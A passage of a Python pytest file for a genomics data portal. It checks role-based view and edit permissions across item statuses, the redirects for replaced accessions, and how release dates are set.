res = wrangler_testapp.get(submitter['@id'])
vgroups = {'viewing_groups': res.json['viewing_groups'] + ['Not 4DN']}
wrangler_testapp.patch_json(res.json['@id'], vgroups, status=200)
def test_revoked_user_denied_authenticated(authenticated_testapp, revoked_user):
authenticated_testapp.get(revoked_user['@id'], status=403)
def test_revoked_user_denied_submitter(submitter_testapp, revoked_user):
submitter_testapp.get(revoked_user['@id'], status=403)
def test_revoked_user_wrangler(wrangler_testapp, revoked_user):
wrangler_testapp.get(revoked_user['@id'], status=200)
def test_labs_view_wrangler(wrangler_testapp, other_lab):
labs = wrangler_testapp.get('/labs/', status=200)
assert(len(labs.json['@graph']) == 1)
##############################################
# Permission tests based on different statuses
# Submitter created item and wants to view
@pytest.fixture
def ind_human_item(human, award, lab):
return {
'award': award['@id'],
'lab': lab['@id'],
'organism': human['@id']
}
@pytest.fixture
def file_item(award, lab, file_formats):
return {
'award': award['@id'],
'lab': lab['@id'],
'file_format': file_formats.get('fastq').get('@id'),
'paired_end': '1'
}
@pytest.fixture
def lab_item(lab):
return {
'name': 'test-lab',
'title': 'test lab',
}
def test_submitter_cannot_view_ownitem(ind_human_item, submitter_testapp, wrangler_testapp):
statuses = ['deleted']
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
submitter_testapp.get(res.json['@graph'][0]['@id'], status=403)
def test_contributing_lab_member_can_view_item(expt_w_cont_lab_item, submitter_testapp,
remc_member_testapp, wrangler_testapp):
statuses = ['released', 'revoked', 'archived', 'released to project',
'archived to project', 'in review by lab', 'submission in progress', 'planned']
res = submitter_testapp.post_json('/experiment_hi_c', expt_w_cont_lab_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
remc_member_testapp.get(res.json['@graph'][0]['@id'], status=200)
# Submitter created item and lab member wants to patch
def test_contributing_lab_member_cannot_patch(expt_w_cont_lab_item, submitter_testapp,
remc_member_testapp, wrangler_testapp):
statuses = ['released', 'revoked', 'archived', 'released to project', 'archived to project',
'in review by lab', 'submission in progress', 'planned']
res = submitter_testapp.post_json('/experiment_hi_c', expt_w_cont_lab_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
remc_member_testapp.patch_json(res.json['@graph'][0]['@id'], {'sex': 'female'}, status=422)
def test_submitter_can_view_ownitem(ind_human_item, submitter_testapp, wrangler_testapp):
statuses = ['current', 'released', 'revoked', 'archived', 'released to project', 'archived to project', 'in review by lab', 'submission in progress', 'planned']
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
submitter_testapp.get(res.json['@graph'][0]['@id'], status=200)
def test_submitter_cannot_view_ownitem_replaced_using_accession(ind_human_item, submitter_testapp, wrangler_testapp):
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": "replaced"}, status=200)
my_accession = '/' + res.json['@graph'][0]['accession']
submitter_testapp.get(my_accession, status=404)
def test_submitter_can_view_ownitem_replaced_using_uuid(ind_human_item, submitter_testapp, wrangler_testapp):
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": "replaced"}, status=200)
my_uuid = '/individuals-human/' + res.json['@graph'][0]['uuid'] + '/'
rep_res = submitter_testapp.get(my_uuid, status=200)
def test_submitter_can_view_ownitem_replaced_using_alias(ind_human_item, submitter_testapp, wrangler_testapp):
# alias will redirect to uuid
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
res_p = wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": "replaced", "aliases": ['test:human']}, status=200)
my_alias = '/' + res_p.json['@graph'][0]['aliases'][0]
rep_res = submitter_testapp.get(my_alias, status=301)
# get the landing url, which is /object_type/uuid in this case
landing = rep_res.headers['Location'].replace('http://localhost', '')
submitter_testapp.get(landing, status=200)
def test_submitter_replaced_item_redirects_to_new_one_with_accession(ind_human_item, submitter_testapp, wrangler_testapp):
# posting 2 individual, changing 1 to replaced, and giving its accession to alternate accession field of the
# second one. This should result in redirect when the old accession is used
# item that will be replaced (old item)
old = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
# item that will replace (new item)
new = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
# patch old one wih status
wrangler_testapp.patch_json(old.json['@graph'][0]['@id'], {"status": "replaced"}, status=200)
# patch new one with alternate accession
wrangler_testapp.patch_json(new.json['@graph'][0]['@id'], {"alternate_accessions": [old.json['@graph'][0]['accession']]}, status=200)
# visit old item and assert that it lands on new item
rep_res = submitter_testapp.get(old.json['@graph'][0]['@id'], status=301)
# get the landing url, which includes a 'redirected_from' query param
redir_param = '?' + urlencode({ 'redirected_from' : old.json['@graph'][0]['@id'] })
landing = rep_res.headers['Location'].replace('http://localhost', '')
assert landing == new.json['@graph'][0]['@id'] + redir_param
submitter_testapp.get(landing, status=200)
def test_submitter_replaced_item_doesnot_redirect_to_new_one_with_uuid(ind_human_item, submitter_testapp, wrangler_testapp):
# posting 2 individual, changing 1 to replaced, and giving its accession to alternate accession field of the
# second one. This should result in redirect when the old accession is used
# Old item should still be accessible with its uuid
old = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
old_uuid = '/individuals-human/' + old.json['@graph'][0]['uuid'] + '/'
print(old_uuid)
# item that will replace (new item)
new = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
# patch old one wih status
wrangler_testapp.patch_json(old.json['@graph'][0]['@id'], {"status": "replaced"}, status=200)
# patch new one with alternate accession
patch_data = {"alternate_accessions": [old.json['@graph'][0]['accession']]}
wrangler_testapp.patch_json(new.json['@graph'][0]['@id'], patch_data, status=200)
# visit old uuid and assert that it lands on old item
submitter_testapp.get(old_uuid, status=200)
def test_submitter_can_not_add_to_alternate_accession_if_not_replaced(ind_human_item, submitter_testapp, wrangler_testapp):
# an accession that's status is not replaced, can not be added to alternate_accessions
old = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
# item that will replace (new item)
new = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
# patch old one wih status
statuses = ['current', 'released', 'revoked', 'archived', 'released to project',
'archived to project', 'in review by lab', 'submission in progress', 'planned']
for status in statuses:
wrangler_testapp.patch_json(old.json['@graph'][0]['@id'], {"status": status}, status=200)
# try adding the accession to alternate accessions
# should result in conflict (409)
wrangler_testapp.patch_json(new.json['@graph'][0]['@id'], {"alternate_accessions": [old.json['@graph'][0]['accession']]}, status=409)
# Submitter created item and wants to patch
def test_submitter_cannot_patch_statuses(ind_human_item, submitter_testapp, wrangler_testapp):
statuses = ['deleted', 'current', 'released', 'revoked', 'archived', 'archived to project', 'released to project']
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
submitter_testapp.patch_json(res.json['@graph'][0]['@id'], {'sex': 'female'}, status=403)
def test_submitter_can_patch_statuses(ind_human_item, submitter_testapp, wrangler_testapp):
statuses = ['in review by lab', 'submission in progress', 'planned']
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
submitter_testapp.patch_json(res.json['@graph'][0]['@id'], {'sex': 'female'}, status=200)
def test_submitter_can_patch_file_statuses(file_item, submitter_testapp, wrangler_testapp):
statuses = ['uploading', 'uploaded', 'upload failed']
res = submitter_testapp.post_json('/file_fastq', file_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
submitter_testapp.patch_json(res.json['@graph'][0]['@id'], {'paired_end': '1'}, status=200)
def test_submitter_cannot_patch_file_statuses(file_item, submitter_testapp, wrangler_testapp):
statuses = ['released', 'revoked', 'deleted', 'released to project', 'archived to project', 'archived']
res = submitter_testapp.post_json('/file_fastq', file_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
submitter_testapp.patch_json(res.json['@graph'][0]['@id'], {'paired_end': '1'}, status=403)
def test_submitter_cannot_patch_replaced(ind_human_item, submitter_testapp, wrangler_testapp):
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": "replaced"}, status=200)
# replaced items are not accessible by accession
my_uuid = '/' + res.json['@graph'][0]['uuid']
submitter_testapp.patch_json(my_uuid, {'sex': 'female'}, status=403)
# Submitter created item and lab member wants to view
def test_labmember_cannot_view_submitter_item(ind_human_item, submitter_testapp, wrangler_testapp, lab_viewer_testapp):
statuses = ['deleted']
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
lab_viewer_testapp.get(res.json['@graph'][0]['@id'], status=403)
def test_labmember_can_view_submitter_item(ind_human_item, submitter_testapp, wrangler_testapp, lab_viewer_testapp):
statuses = ['current', 'released', 'revoked', 'released to project', 'in review by lab',
'archived', 'archived to project', 'submission in progress', 'planned']
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
lab_viewer_testapp.get(res.json['@graph'][0]['@id'], status=200)
def test_labmember_can_view_submitter_file(file_item, submitter_testapp, wrangler_testapp, lab_viewer_testapp):
statuses = ['released', 'revoked', 'released to project', 'uploading', 'uploaded', 'upload failed',
'archived', 'archived to project']
res = submitter_testapp.post_json('/file_fastq', file_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
lab_viewer_testapp.get(res.json['@graph'][0]['@id'], status=200)
def test_labmember_cannot_view_submitter_item_replaced_accession(ind_human_item, submitter_testapp, wrangler_testapp, lab_viewer_testapp):
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": "replaced"}, status=200)
lab_viewer_testapp.get(res.json['@graph'][0]['@id'], status=404)
def test_labmember_can_view_submitter_item_replaced_uuid(ind_human_item, submitter_testapp, wrangler_testapp, lab_viewer_testapp):
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": "replaced"}, status=200)
my_uuid = '/individuals-human/' + res.json['@graph'][0]['uuid'] + '/'
lab_viewer_testapp.get(my_uuid, status=200)
# Submitter created item and lab member wants to patch
def test_labmember_cannot_patch_submitter_item(ind_human_item, submitter_testapp, wrangler_testapp, lab_viewer_testapp):
statuses = ['current', 'released', 'revoked', 'archived', 'released to project',
'archived to project', 'in review by lab', 'submission in progress', 'planned']
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
lab_viewer_testapp.patch_json(res.json['@graph'][0]['@id'], {'sex': 'female'}, status=403)
# Submitter created item and lab member wants to patch
def test_labmember_cannot_patch_submitter_file(file_item, submitter_testapp, wrangler_testapp, lab_viewer_testapp):
statuses = ['released', 'revoked', 'released to project', 'uploading', 'uploaded',
'upload failed', 'archived', 'archived to project']
res = submitter_testapp.post_json('/file_fastq', file_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
lab_viewer_testapp.patch_json(res.json['@graph'][0]['@id'], {'paired_end': '2'}, status=403)
# person with shared award tests
def test_awardmember_cannot_view_submitter_item(ind_human_item, submitter_testapp, wrangler_testapp, award_viewer_testapp):
statuses = ['deleted']
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
award_viewer_testapp.get(res.json['@graph'][0]['@id'], status=403)
# people who share the same award should be able to view items that have yet to be released generally
def test_awardmember_can_view_submitter_item(ind_human_item, submitter_testapp, wrangler_testapp, award_viewer_testapp):
statuses = ['current', 'released', 'revoked', 'archived', 'in review by lab', 'pre-release',
'released to project', 'submission in progress', 'planned']
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
award_viewer_testapp.get(res.json['@graph'][0]['@id'], status=200)
def test_awardmember_cannot_view_submitter_item_replaced(ind_human_item, submitter_testapp, wrangler_testapp, award_viewer_testapp):
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": "replaced"}, status=200)
award_viewer_testapp.get(res.json['@graph'][0]['@id'], status=404)
# Submitter created item and lab member wants to patch
def test_awardmember_cannot_patch_submitter_item(ind_human_item, submitter_testapp, wrangler_testapp, award_viewer_testapp):
statuses = ['current', 'released', 'revoked', 'archived', 'released to project', 'in review by lab',
'submission in progress', 'planned', 'archived to project', 'pre-release']
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
award_viewer_testapp.patch_json(res.json['@graph'][0]['@id'], {'sex': 'female'}, status=403)
# Submitter created item and project member wants to view
def test_viewing_group_member_cannot_view_submitter_item(ind_human_item, submitter_testapp, wrangler_testapp, viewing_group_member_testapp):
statuses = ['deleted', 'in review by lab', 'submission in progress', 'planned']
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
viewing_group_member_testapp.get(res.json['@graph'][0]['@id'], status=403)
# Submitter created item and project member wants to view
def test_viewing_group_member_cannot_view_submitter_file(file_item, submitter_testapp, wrangler_testapp, viewing_group_member_testapp):
statuses = ['deleted', 'uploading', 'uploaded', 'upload failed', 'pre-release']
res = submitter_testapp.post_json('/file_fastq', file_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
viewing_group_member_testapp.get(res.json['@graph'][0]['@id'], status=403)
def test_viewing_group_member_can_view_submitter_item(ind_human_item, submitter_testapp, wrangler_testapp, viewing_group_member_testapp):
statuses = ['current', 'released', 'revoked', 'released to project',
'archived', 'archived to project']
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
viewing_group_member_testapp.get(res.json['@graph'][0]['@id'], status=200)
def test_viewing_group_member_can_view_submitter_file(file_item, submitter_testapp, wrangler_testapp, viewing_group_member_testapp):
statuses = ['released', 'revoked', 'released to project', 'archived to project']
res = submitter_testapp.post_json('/file_fastq', file_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
viewing_group_member_testapp.get(res.json['@graph'][0]['@id'], status=200)
def test_viewing_group_member_can_view_submitter_item_replaced_with_uuid(ind_human_item, submitter_testapp, wrangler_testapp, viewing_group_member_testapp):
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": "replaced"}, status=200)
my_uuid = '/individuals-human/' + res.json['@graph'][0]['uuid'] + '/'
viewing_group_member_testapp.get(my_uuid, status=200)
def test_viewing_group_member_cannot_view_submitter_item_replaced_with_accession(ind_human_item, submitter_testapp, wrangler_testapp, viewing_group_member_testapp):
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": "replaced"}, status=200)
my_accession = '/' + res.json['@graph'][0]['accession']
viewing_group_member_testapp.get(my_accession, status=404)
# Submitter created item and viewing group member wants to patch
def test_viewing_group_member_cannot_patch_submitter_item(ind_human_item, submitter_testapp, wrangler_testapp, viewing_group_member_testapp):
statuses = ['current', 'released', 'revoked', 'archived', 'released to project', 'in review by lab',
'archived to project', 'submission in progress', 'planned']
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
viewing_group_member_testapp.patch_json(res.json['@graph'][0]['@id'], {'sex': 'female'}, status=403)
def test_viewing_group_member_cannot_patch_submitter_file(file_item, submitter_testapp, wrangler_testapp, viewing_group_member_testapp):
statuses = ['released', 'revoked', 'archived', 'released to project', 'archived to project',
'uploading', 'uploaded', 'upload failed']
res = submitter_testapp.post_json('/file_fastq', file_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
viewing_group_member_testapp.patch_json(res.json['@graph'][0]['@id'], {'paired_end': '2'}, status=403)
def test_non_member_can_view_submitter_item(ind_human_item, submitter_testapp, wrangler_testapp, remc_member_testapp):
statuses = ['current', 'released', 'revoked', 'archived']
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
remc_member_testapp.get(res.json['@graph'][0]['@id'], status=200)
def test_non_member_can_view_submitter_file(file_item, submitter_testapp, wrangler_testapp, remc_member_testapp):
statuses = ['released', 'revoked', 'archived']
res = submitter_testapp.post_json('/file_fastq', file_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
remc_member_testapp.get(res.json['@graph'][0]['@id'], status=200)
def test_non_member_cannot_view_submitter_item(ind_human_item, submitter_testapp, wrangler_testapp, remc_member_testapp):
statuses = ['released to project', 'archived to project', 'submission in progress',
'in review by lab', 'deleted', 'planned']
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
remc_member_testapp.get(res.json['@graph'][0]['@id'], status=403)
def test_non_member_cannot_view_submitter_file(file_item, submitter_testapp, wrangler_testapp, remc_member_testapp):
statuses = ['released to project', 'archived to project', 'uploading', 'uploaded', 'upload failed']
res = submitter_testapp.post_json('/file_fastq', file_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
remc_member_testapp.get(res.json['@graph'][0]['@id'], status=403)
def test_everyone_can_view_lab_item(lab_item, submitter_testapp, wrangler_testapp, remc_member_testapp):
statuses = ['current', 'revoked', 'inactive']
apps = [submitter_testapp, wrangler_testapp, remc_member_testapp]
res = wrangler_testapp.post_json('/lab', lab_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
for app in apps:
app.get(res.json['@graph'][0]['@id'], status=200)
def test_noone_can_view_deleted_lab_item(lab_item, submitter_testapp, wrangler_testapp, remc_member_testapp):
lab_item['status'] = 'deleted'
viewing_apps = [submitter_testapp, remc_member_testapp]
res = wrangler_testapp.post_json('/lab', lab_item, status=201)
for app in viewing_apps:
app.get(res.json['@graph'][0]['@id'], status=403)
def test_lab_submitter_can_edit_lab(lab, submitter_testapp, wrangler_testapp):
res = submitter_testapp.get(lab['@id'])
wrangler_testapp.patch_json(res.json['@id'], {'status': 'current'}, status=200)
submitter_testapp.patch_json(res.json['@id'], {'city': 'My fair city'}, status=200)
def test_statuses_that_lab_submitter_cannot_edit_lab(lab, submitter_testapp, wrangler_testapp):
statuses = ['deleted', 'revoked', 'inactive']
res = submitter_testapp.get(lab['@id'])
for status in statuses:
wrangler_testapp.patch_json(res.json['@id'], {'status': status}, status=200)
submitter_testapp.patch_json(res.json['@id'], {'city': 'My fair city'}, status=403)
def test_lab_submitter_cannot_edit_lab_name_or_title(lab, submitter_testapp, wrangler_testapp):
res = submitter_testapp.get(lab['@id'])
wrangler_testapp.patch_json(res.json['@id'], {'status': 'current'}, status=200)
submitter_testapp.patch_json(res.json['@id'], {'title': 'Test Lab, HMS'}, status=422)
submitter_testapp.patch_json(res.json['@id'], {'name': 'test-lab'}, status=422)
def test_wrangler_can_edit_lab_name_or_title(lab, submitter_testapp, wrangler_testapp):
statuses = ['deleted', 'revoked', 'inactive', 'current']
new_name = 'test-lab'
new_id = '/labs/test-lab/'
res = submitter_testapp.get(lab['@id'])
original_id = res.json['@id']
original_name = res.json['name']
for status in statuses:
wrangler_testapp.patch_json(original_id, {'status': status}, status=200)
wrangler_testapp.patch_json(original_id, {'title': 'Test Lab, HMS'}, status=200)
wrangler_testapp.patch_json(original_id, {'name': new_name}, status=200)
wrangler_testapp.patch_json(new_id, {'name': original_name}, status=200)
def test_ac_local_roles_for_lab(registry):
lab_data = {
'status': 'in review by lab',
'award': 'b0b9c607-bbbb-4f02-93f4-9895baa1334b',
'uuid': '828cd4fe-aaaa-4b36-a94a-d2e3a36aa989'
}
test_lab = Lab.create(registry, None, lab_data)
lab_ac_locals = test_lab.__ac_local_roles__()
assert('role.lab_submitter' in lab_ac_locals.values())
assert('role.lab_member' in lab_ac_locals.values())
def test_last_modified_works_correctly(ind_human_item, submitter, wrangler, submitter_testapp, wrangler_testapp):
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201).json['@graph'][0]
assert res['last_modified']['modified_by'] == submitter['@id']
# patch same item using a different user
res2 = wrangler_testapp.patch_json(res['@id'], {"status": "current"}, status=200).json['@graph'][0]
assert res2['last_modified']['modified_by'] == wrangler['@id']
assert res2['last_modified']['date_modified'] > res['last_modified']['date_modified']
@pytest.fixture
def individual_human(human, remc_lab, nofic_award, wrangler_testapp):
ind_human = {'lab': remc_lab['@id'], 'award': nofic_award['@id'], 'organism': human['@id']}
return wrangler_testapp.post_json('/individual_human', ind_human, status=201).json['@graph'][0]
def test_multi_viewing_group_viewer_can_view_nofic_when_submission_in_progress(
wrangler_testapp, multi_viewing_group_member_testapp, individual_human):
#import pdb; pdb.set_trace()
wrangler_testapp.patch_json(individual_human['@id'], {'status': 'submission in progress'}, status=200)
res = wrangler_testapp.get(individual_human['@id'], status=200)
multi_viewing_group_member_testapp.get(individual_human['@id'], status=200)
def test_viewing_group_viewer_cannot_view_nofic_when_submission_in_progress(
wrangler_testapp, viewing_group_member_testapp, individual_human):
wrangler_testapp.patch_json(individual_human['@id'], {'status': 'submission in progress'}, status=200)
viewing_group_member_testapp.get(individual_human['@id'], status=403)
### These aren't strictly permissions tests but putting them here so we don't need to
### move around wrangler and submitter testapps and associated fixtures
@pytest.fixture
def planned_experiment_set_data(lab, award):
return {
'lab': lab['@id'],
'award': award['@id'],
'description': 'test experiment set',
'experimentset_type': 'custom',
}
@pytest.fixture
def status2date():
return {
'released': 'public_release',
'released to project': 'project_release'
}
def test_planned_item_status_can_be_updated_by_admin(
submitter_testapp, wrangler_testapp, planned_experiment_set_data):
# submitter cannot change status so wrangler needs to patch
res1 = submitter_testapp.post_json('/experiment_set', planned_experiment_set_data).json['@graph'][0]
assert res1['status'] == 'in review by lab'
res2 = wrangler_testapp.patch_json(res1['@id'], {'status': 'planned'}).json['@graph'][0]
assert res2['status'] == 'planned'
def test_planned_item_status_is_not_changed_on_admin_patch(
submitter_testapp, wrangler_testapp, planned_experiment_set_data):
desc = 'updated description'
res1 = submitter_testapp.post_json('/experiment_set', planned_experiment_set_data).json['@graph'][0]
wrangler_testapp.patch_json(res1['@id'], {'status': 'planned'}, status=200)
res2 = wrangler_testapp.patch_json(res1['@id'], {'description': desc}).json['@graph'][0]
assert res2['description'] == desc
assert res2['status'] == 'planned'
def test_planned_item_status_is_changed_on_submitter_patch(
submitter_testapp, wrangler_testapp, planned_experiment_set_data):
desc = 'updated description'
res1 = submitter_testapp.post_json('/experiment_set', planned_experiment_set_data).json['@graph'][0]
wrangler_testapp.patch_json(res1['@id'], {'status': 'planned'}, status=200)
res2 = submitter_testapp.patch_json(res1['@id'], {'description': desc}).json['@graph'][0]
assert res2['description'] == desc
assert res2['status'] == 'submission in progress'
# these tests are for the item _update function as above so sticking them here
def test_unreleased_item_does_not_get_release_date(
wrangler_testapp, planned_experiment_set_data, status2date):
res1 = wrangler_testapp.post_json('/experiment_set', planned_experiment_set_data).json['@graph'][0]
assert res1['status'] == 'in review by lab'
for datefield in status2date.values():
assert datefield not in res1
def test_insert_of_released_item_does_get_release_date(
wrangler_testapp, planned_experiment_set_data, status2date):
for status, datefield in status2date.items():
planned_experiment_set_data['status'] = status
res = wrangler_testapp.post_json('/experiment_set', planned_experiment_set_data).json['@graph'][0]
assert res['status'] == status
assert res[datefield] == date.today().isoformat()
if status in ['released', 'current']:
assert res['project_release'] == res['public_release']
def test_update_of_item_to_released_status_adds_release_date(
wrangler_testapp, planned_experiment_set_data, status2date):
for status, datefield in status2date.items():
res1 = wrangler_testapp.post_json('/experiment_set', planned_experiment_set_data).json['@graph'][0]
assert res1['status'] == 'in review by lab'
assert datefield not in res1
res2 = wrangler_testapp.patch_json(res1['@id'], {'status': status}, status=200).json['@graph'][0]
assert res2['status'] == status
assert res2[datefield] == date.today().isoformat()
if status == 'released to project':
assert 'public_release' not in res2
if status in ['released', 'current']:
assert res2['project_release'] == res2['public_release']
def test_update_of_item_to_non_released_status_does_not_add_release_date(
wrangler_testapp, planned_experiment_set_data):
statuses = ["planned", "revoked", "deleted", "obsolete", "replaced", "in review by lab", "submission in progress"]
datefields = ['public_release', 'project_release']
for status in statuses:
res1 = wrangler_testapp.post_json('/experiment_set', planned_experiment_set_data).json['@graph'][0]
assert res1['status'] == 'in review by lab'
res2 = wrangler_testapp.patch_json(res1['@id'], {'status': status}, status=200).json['@graph'][0]
assert res2['status'] == status
for datefield in datefields:
assert datefield not in res1
assert datefield not in res2
def test_update_of_item_that_has_release_date_does_not_change_release_date(
wrangler_testapp, planned_experiment_set_data, status2date):
test_date = '2001-01-01'
for status, datefield in status2date.items():
planned_experiment_set_data[datefield] = test_date
res1 = wrangler_testapp.post_json('/experiment_set', planned_experiment_set_data).json['@graph'][0]
assert res1['status'] == 'in review by lab'
assert res1[datefield] == test_date
res2 = wrangler_testapp.patch_json(res1['@id'], {'status': status}, status=200).json['@graph'][0]
assert res2['status'] == status
assert res2[datefield] == test_date
def test_update_of_item_without_release_dates_mixin(wrangler_testapp, award):
assert award['status'] == 'current'
datefields = ['public_release', 'project_release']
for field in datefields:
assert field not in award
# tests for bogus nofic specific __ac_local_roles__
def test_4dn_can_view_nofic_released_to_project(
planned_experiment_set_data, wrangler_testapp, viewing_group_member_testapp,
nofic_award):
eset_item = planned_experiment_set_data
eset_item['award'] = nofic_award['@id']
eset_item['status'] = 'released to project'
res1 = wrangler_testapp.post_json('/experiment_set', eset_item).json['@graph'][0]
viewing_group_member_testapp.get(res1['@id'], status=200)
def test_4dn_cannot_view_nofic_not_joint_analysis_planned_and_in_progress(
planned_experiment_set_data, wrangler_testapp, viewing_group_member_testapp,
nofic_award):
statuses = ['planned', 'submission in progress']
eset_item = planned_experiment_set_data
eset_item['award'] = nofic_award['@id']
for status in statuses:
eset_item['status'] = status
res1 = wrangler_testapp.post_json('/experiment_set', eset_item).json['@graph'][0]
viewing_group_member_testapp.get(res1['@id'], status=403)
def test_4dn_can_view_nofic_joint_analysis_planned_and_in_progress(
planned_experiment_set_data, wrangler_testapp, viewing_group_member_testapp,
nofic_award):
statuses = ['planned', 'submission in progress']
eset_item = planned_experiment_set_data
eset_item['award'] = nofic_award['@id']
eset_item['tags'] = ['Joint Analysis']
for status in statuses:
eset_item['status'] = status
res1 = wrangler_testapp.post_json('/experiment_set', eset_item).json['@graph'][0]
viewing_group_member_testapp.get(res1['@id'], status=200)
@pytest.fixture
def replicate_experiment_set_data(lab, award):
return {
'lab': lab['@id'],
'award': award['@id'],
'description': 'test replicate experiment set',
'experimentset_type': 'replicate',
}
def test_ready_to_process_set_status_admin_can_edit(
submitter_testapp, wrangler_testapp, replicate_experiment_set_data):
res1 = submitter_testapp.post_json('/experiment_set_replicate', replicate_experiment_set_data).json['@graph'][0]
assert res1['status'] == 'in review by lab'
res2 = wrangler_testapp.patch_json(res1['@id'], {'status': 'pre-release'}).json['@graph'][0]
assert res2['status'] == 'pre-release'
# admin can Edit
res3 = wrangler_testapp.patch_json(res1['@id'], {'description': 'admin edit'}, status=200).json['@graph'][0]
assert res3['description'] == 'admin edit'
def test_ready_to_process_set_status_submitter_can_view(
submitter_testapp, wrangler_testapp, replicate_experiment_set_data):
res1 = submitter_testapp.post_json('/experiment_set_replicate', replicate_experiment_set_data).json['@graph'][0]
assert res1['status'] == 'in review by lab'
res2 = wrangler_testapp.patch_json(res1['@id'], {'status': 'pre-release'}).json['@graph'][0]
assert res2['status'] == 'pre-release'
# submitter can view
res3 = submitter_testapp.get(res1['@id'], status=200).json
assert res3['description'] == 'test replicate experiment set'
def test_ready_to_process_set_status_submitter_can_not_edit(
submitter_testapp, wrangler_testapp, replicate_experiment_set_data):
res1 = submitter_testapp.post_json('/experiment_set_replicate', replicate_experiment_set_data).json['@graph'][0]
assert res1['status'] == 'in review by lab'
res2 = wrangler_testapp.patch_json(res1['@id'], {'status': 'pre-release'}).json['@graph'][0]
assert res2['status'] == 'pre-release'
# submitter can not edit
submitter_testapp.patch_json(res1['@id'], {'description': 'submitter edit'}, status=403)
def test_ready_to_process_set_status_others_can_not_view(
submitter_testapp, wrangler_testapp, viewing_group_member_testapp, replicate_experiment_set_data):
res1 = submitter_testapp.post_json('/experiment_set_replicate', replicate_experiment_set_data).json['@graph'][0]
assert res1['status'] == 'in review by lab'
